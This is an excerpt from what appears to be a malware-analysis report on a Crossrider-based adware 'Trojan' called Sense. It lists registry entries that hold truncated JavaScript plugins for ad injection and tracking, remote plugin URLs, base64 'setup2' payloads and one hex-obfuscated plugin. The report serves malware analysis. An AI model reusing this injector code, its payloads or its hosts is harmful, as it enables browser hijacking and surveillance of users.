z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elb"

    [HKCU\Software\Sense\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\Sense\Plugins\183]
    "Name" = "tabsWrapper"

    [HKCU\Software\Sense\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\Sense\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seb"

    [HKCU\Software\Sense\Plugins\36]
    "Version" = "8"

    [HKCU\Software\Sense\Plugins\184]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/noproblemppc_m.js"

    [HKCU\Software\Sense\Plugins\244]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/engageya_inner_m.js"

    [HKCU\Software\Sense\Plugins\239]
    "Name" = "revizer_ws_dynamic_b2b_safe_m"

    [HKCU\Software\Sense\Plugins\22]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources.js"

    [HKCU\Software\Sense\Plugins\7]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/hooks.js"

    [HKCU\Software\Sense\Plugins\104]
    "Version" = "9"

    [HKCU\Software\Sense\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\Sense\Plugins\35]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){bb"

    [HKCU\Software\Sense\Plugins\184]
    "Version" = "9"

    [HKCU\Software\Sense\Plugins\104]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke粑b"

    [HKCU\Software\Sense\Plugins\123]
    "Name" = "intext_adv_m"

    [HKCU\Software\Sense\Plugins\28]
    "Name" = "initializer"

    [HKCU\Software\Sense\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\Sense\Manifest]
    "Manifest" = "NA"

    [HKCU\Software\Sense\Plugins\78]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderInfo.js"

    [HKCU\Software\Sense\Plugins\2]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_1.js"

    [HKCU\Software\Sense\Plugins\3]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\123]
    "Version" = "9"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Sense\Plugins\72]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\193]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_m.js"
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTM2NTY3NDYwNjE4MTUxOTNkMWMwNDRkNTQ0NDRjMDQxNTFkMTg1NDQ3NDAwZjE3MWMxYTRjMDg0NjBmMDMwZTAzMDUwNzA0MDU0NzA2MGIxYzQwMWQwMDQxNWQ1NjU5NTg0MTU5NWY1YzUwNDAwNjEyNGI0NDY0NjE0ZDA2MTAxYTFjMTIzYzFhMDI0YTU1NGU0NjA2MTgxNTE5MWI1NDQ3NDAwZjE3MWMxYTRjMDg0NjBmMDMwZTAzMDUwNzA0MDU0NzA2MGIxYzQwMWQwMDQxNWQ1NjU5NTg0MTU5NWY1YzUwNDAwNjEyNGI0NDY0NjE0ZDFlMDgxYjBiMDgwNzIxMGE0YTU1NGU1NTU3NWY0ZDYzNDg0ZTQ4NGY0YzEyMGIxZTE1MDAwYjBmMDQ0ZDU0NDQzNTRlMDAwZDFiNGMzNTQzNjQ0NDRlNGM0MTRiMDEwMDA0MDYwMDAxMjQzZjQzNTM0ODRjMWYwNjAwMDAwMTFiNGYzNjFhMTgxMjVlNTk1NDVlMTQ1MDU5NWE1YTQ4NTI0ZTFmNGU0YjExMWMwYTAyMDExYzA2MDExYzMzMTIxYzBhMDcwYzQ4NTQ0NDQ5MzMzZTJhM2EyMTNiM2MzYzJkMmEyOTMzMzYyNDI3MmYyNzNhM2IzZDM5MjMzNjIxMmEzNzMwNDk0NDQ1NGM0NjU5NTg1ZTU4NWY1ZTU0NWU1YzUxNTk0ZjEzNTM0ZDY0MTk=', 'hondnlaihn'); }"

    [HKCU\Software\Sense\Plugins\72]
    "Name" = "appApiValidation"

    [HKCU\Software\Sense\Plugins\13]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/CrossriderAppUtils.js"

    [HKCU\Software\Sense\Plugins\211]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"

    [HKCU\Software\Sense\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appAO"

    [HKCU\Software\Sense\Plugins\233]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk3YzY3NTYwZTFiMGQxZTI1MTQwZTU0NTQ1NDQ0MDcwZDFhMDA1YzRkNTkwZjA3MTQxOTU0MGY1ZTA3MDkxNzAzMTUwZjA3MWQ0MDFlMDMxNjU5MWQxMDQ5NWU0ZTVlNDA0OTUzNDY1YjQ0NDgwNTBhNGM1YzZjNmI1NDA2MDAxMjFmMGEzYjAyMGE0MDRjNGU1NjBlMWIwZDFlMDM1YzRkNTkwZjA3MTQxOTU0MGY1ZTA3MDkxNzAzMTUwZjA3MWQ0MDFlMDMxNjU5MWQxMDQ5NWU0ZTVlNDA0OTUzNDY1YjQ0NDgwNTBhNGM1YzZjNmI1NDFlMTgxMzA4MTAwMDM5MDI0MDRjNGU0NjU1NWM1NTY0NTA0NjQyNTY0YzAyMDMxZDBkMDcxMzA3MGU1NDU0NTQzZDRkMTgwYTAzNDQzZjVhNjQ1NDQ2NGY1OTRjMTkwODBlMWYwMDExMmMzYzViNTQ1MDQ0MTUxZjAwMTAwOTE4NTczMTAyMTAxODQ3NTk0NDU2MTc0ODVlNDU1NjQyNGI0ZTBmNDY0ODA5MWIxMjBhMGIwNTA2MTExNDMwMGExYjEyMGYwNjUxNTQ1NDQxMzAyNjJkMjIyOTMxMjUzYzNkMjIyYTJiMzEzYzJmMjUzZTNhMmIzNTNhM2IzMTM5MjIzZDI5NDk1NDRkNGY1ZTVlNDA1NjUyNDY1ZTQ0NTY1ZjQ5NWU1NzFiNTk1NDY0MDk=', 'bvntfoynpf'); }"

    [HKCU\Software\Sense\Plugins\41]
    "Name" = "IEInfo"

    [HKCU\Software\Sense\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\Sense\Plugins\230]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_2_m.js"

    [HKCU\Software\Sense\Plugins\244]
    "Name" = "engageya_inner_m"

    [HKCU\Software\Sense\Plugins\42]
    "Version" = "9"

    [HKCU\Software\Sense\Plugins\207]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/dbWrapper.js"

    [HKCU\Software\Sense\Plugins\4]
    "JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f(< a >).appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt-b"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Plugins\155]
    "Name" = "ibario_pops_m"

    [HKCU\Software\Sense\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,123,155,180,184,191,192,193,211,223,226,230,233,239,242,244,263,91"

    [HKCU\Software\Sense\Plugins\102]
    "Name" = "dealply_m"

    [HKCU\Software\Sense\Plugins\7]
    "Version" = "2"

    [HKCU\Software\Sense\Manifest]
    "PublisherId" = "20891"

    [HKCU\Software\Sense\Plugins\2]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Sense\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\Sense\Plugins\193]
    "Name" = "revizer_p_dynamic_b2b_m"

    [HKCU\Software\Sense\Plugins\180]
    "Version" = "10"

    [HKCU\Software\Sense\Plugins\182]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/openUrl.js"

    [HKCU\Software\Sense\Plugins\13]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins\191]
    "Version" = "5"

    [HKCU\Software\Sense\Manifest]
    "Description" = "."

    [HKCU\Software\Sense\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;O"

    [HKCU\Software\Sense\Plugins\191]
    "Name" = "ciuvo_m"

    [HKCU\Software\Sense\Plugins\46]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setInb"
    "Name" = "IETimers"

    [HKCU\Software\Sense\Plugins\21]
    "Version" = "5"
    "Name" = "debug"

    [HKCU\Software\Sense\Plugins\220]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_base_m.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

    [HKCU\Software\Sense\Plugins\195]
    "Version" = "25"

    [HKCU\Software\Sense\Plugins\263]
    "Version" = "1"

    [HKCU\Software\Sense\Plugins\246]
    "JavaScript" = "var _0x25da=[""\x73\x74\x72\x69\x6E\x67""

    [HKCU\Software\Sense\Plugins\41]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins\192]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_m.js"

    [HKCU\Software\Sense\Plugins\43]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\239]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_safe_m.js"

    [HKCU\Software\Sense\Plugins\220]
    "Version" = "8"

    [HKCU\Software\Sense\Plugins\1]
    "JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});Cb"

    [HKCU\Software\Sense\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\Sense\Debug]
    "IsDebuggingPlugins" = "0"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Common AppData" = "%Documents and Settings%\All Users\Application Data"

    [HKCU\Software\Sense\Plugins\180]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/bpo_serp_m.js"

    [HKCU\Software\Sense\Plugins\244]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU3Zjc4NTUwOTE1MDAwODJkMTAwMjU3NGI1NzQzMDkwMDBjMDg1ODQxNWExNDBmMTU1MDVhMWQxNjA1MGYxMjE0MGUwMDRmMTcxNzE1NGQxOTFjMTUxMDA0MTU1YjExMTYwODBiMTYwNTI4MTIxMTE1MGExMzRkMDcxYjFiMjgxMjExMDYxMzI3MTExYTE0MDMwMzA0MTM1YTEyMGI1ZDFlMWMxNTRhMmQzNTMxMGIzNzI2MmY0NDNlMzMzMDEyMzkxMjFmNTEyMzFmMzgwNDJmMjUxNzRjMzczNjJmNTA0MjMzNDcxMjAxMWExMTA2NTMyYTJlMzQzMzJlMjcyYjJhMmIyYTMwMjMyODMyMzQzNjI3MzEyNjMxMmE1MzViNmI2ODU2MDgxNDE3MDkxYzFmM2UwNTQzNGU1ODRhNTY1YTdmMGM=', 'nuqwaatxxb'); }"

    [HKCU\Software\Sense\Plugins\44]
    "Version" = "6"

    [HKCU\Software\Sense\Plugins\4]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/jquery-1_7_1_min.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

    [HKCU\Software\Sense\Plugins\191]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/ciuvo_m.js"

    [HKCU\Software\Sense\Plugins\192]
    "Version" = "7"

    [HKCU\Software\Sense\Plugins\230]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\Sense\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Sense\Plugins\93]
    "Name" = "superfish_no_coupons_m"

    [HKCU\Software\Sense\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\Sense\Plugins\244]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\211]
    "Version" = "5"

    [HKCU\Software\Sense\Code]
    "BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

    [HKCU\Software\Sense\Plugins\239]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\184]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTA2YjdmNDkwYjBkMWQwNTI0MTAwNzQzNGM0YjQxMTExZDAxMDE1ODQ0NGUxODFiMTA1NzA3MWEwMTEwMDQwMzFhMGUwZTA5MTkxNjVmMDEwNDBjNTkwNTEzMGEwYjVhMWQwZDBjMDgxNTQ1MDkwYTU2M2EwMzBiMGMwODE4MjIwNzQ0MmM0ZDMwNTYyYTUzNDUyYTRlM2I1OTQ2NDU0ZjJlNTM0NzVhNGUzODUwMzQ0MTRmNWI1MTQ3NWU1MjRlMmQ0NDQxMjQ1ZDI0NTAzODBhMGQwYzNjMTU1ZjM4MDAxYTBlMTA1ZjM5MTQwMzE2MDUwNDA0MjIyNzQ0NWI0NTQxNTI1YjQ3MjYxOTBjMWQxYzE2MDUyYzBhMGMxMzU2M2MyNjJhMjczZTMxMzgzMzNmMmYyNjJiMzYzNDIxMzIzNDJmMzcyNjI2MjYzNjUzMjUwZDA0MGQxNDBhMTEzMDBkNDgyZTNkMjgzMzM5MzgzMDJiMjAzMTM0MzAzNDMyMjMyOTNjMzAyZDJhMmU0MDQ3NmI3ZjQ5MGIwZDFkMDUwMjM3MTkwZDU0NTE0MzViMDEwMTA1MTIxODViNTk0NDBkMDkxYTViMWYwZDFiMTMxOTA5MGYxYzA0MDUwMTAxNDUwMjE5MDY0YzE3MTkwNjEzNGQwNzBlMTEwMjAwNTcwMzA2NGUyZDE5MDgxMTAyMGQzMDBkNDgzNDVhMmE1NTM3NTk1MDM4NDQzNzQxNTE1ZjRjMzM1OTUyNDg0NDM0NDgyMzViNGM0NjViNTI0YzU4NDIzNTUzNWIyNzQwMmU0NTJhMDAwMTE0MmIwZjVjMjUwYTBmMWMxYTUzMjEwMzE5MTUxODBlMTEzMDJkNDg0MzUyNWI1MTQ2NGQzMzBiMDYxMTA0MDExZjJmMTcwNjA2NDQzNjJhMzIzMDI0MzIyNTM5MmEzZDJjMjcyZTIzM2IzMTI5MjUyMjM0MmM瘝b"

    [HKCU\Software\Sense\Plugins\91]
    "JavaScript" = "(function(t){var v=06-01;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var F=appAPI.utils.MD5;if(!F||!F.encode){F={};F.encode=function(M){return M;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var J=appAPI.utils;var w={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.datademoserv.com/monetization_campaigns/,statsHostUrl:http://logs.datademoserv.com/monetization.gif?,errorHostUrl:http://errors.datademoserv.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAppDefualtInstallEveO"

    [HKCU\Software\Sense\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKCU\Software\Sense\Manifest]
    "DisableIe" = "true"
    "IsButtonEnabled" = "false"

    [HKCU\Software\Sense\Plugins\192]
    "Name" = "revizer_ws_dynamic_b2b_m"

    [HKCU\Software\Sense\Plugins\35]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEAjax.js"

    [HKCU\Software\Sense\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\Sense\Manifest]
    "PluginsManifestVersion" = "56"
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\Sense\Plugins\242]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/price_gong_m.js"

    [HKCU\Software\Sense\Plugins\39]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEDatabase.js"

    [HKCU\Software\Sense\Plugins\64]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi0b"

    [HKCU\Software\Sense\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\Sense\Manifest]
    "homepageurl" = "NA"
    "EnableSearchIE" = "false"
    "ThanksUrl" = "NA"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\Sense\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.seb"

    [HKCU\Software\Sense\Plugins\223]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE3YjYyNDEwZjFkMWUwMjJkMDIxNjUzNTE0MzQ1MDExZTA2MDg0YTU1NWUwODA3MDk0NzFjMWIwYjExMWUxNTQ1MDAwODA0NDUwMTFiMDIxMzAxMWY0YzU2NWQ1ZjQ0NGY0NzQ4NDQ1YzU1NTI0NjFhMDAxZDFjMTUxMDBmNGQwZDFhNTUwMTBkMTIxMzE1NTYzYzM4MmEzODNkMmIyMzI4MzgyZjI2MzUzNjM5MjczYTJmMzMzNTM0M2M0NTQ1NjA3YjVhMDAxNjA0MGMwYTA5MjAwZTUwNDI1MDQ4NDM1ODRmNmQ0OTRhNTI1ODUyMGMxNDE5MTcwZTBhMGIxZTVhNGE1YTJhNDkxMDBmMDYxYTAyMTExZTFkNTMzNjY5MWE=', 'zqkcgijrxp'); }"

    [HKCU\Software\Sense\Plugins\46]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IETimers.js"

    [HKCU\Software\Sense\Plugins\17]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/jQuery.js"

    [HKCU\Software\Sense\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\Sense\Plugins\64]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiMessage.js"

    [HKCU\Software\Sense\Plugins\45]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEOnRequest.js"

    [HKCU\Software\Sense\Plugins\102]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/dealply_m.js"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

